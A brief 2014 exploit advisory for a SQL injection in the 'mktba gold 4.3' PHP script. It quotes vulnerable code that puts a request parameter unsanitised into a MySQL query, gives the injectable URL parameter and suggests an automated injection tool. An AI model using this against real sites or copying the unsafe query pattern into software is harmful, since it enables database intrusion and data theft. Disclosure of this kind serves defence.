facebook facebook twitter rss

mktba gold 4.3 SQl injection

Author: hamza killer , Published: 25-05-2014
######################################################################
# mktba gold 4.3 SQl injection #
# Author : Hamza killer :D #
# E-mail : hlyzidi@gmail.com #
# GoogleDork: -_- !!! #
# Vendor : http://mktba.org/ #
######################################################################
Code:
---
if($_REQUEST['action']==doaddplay)
{
$catidcat= $_REQUEST['catidcat'];

if(!$_REQUEST['name']){
$doo="áã ÊÞã ÈßÊÇÈÉ ÇÇáÇÓã";
}else{
$e=mysql_query("select * from cat where catid='$catidcat'");
while($row=mysql_fetch_array($e)){

Exploit:
-------
localhost/mktba/addplay.php?action=doaddplay&catidcat=[inject]

use havij :D

Like us on Facebook :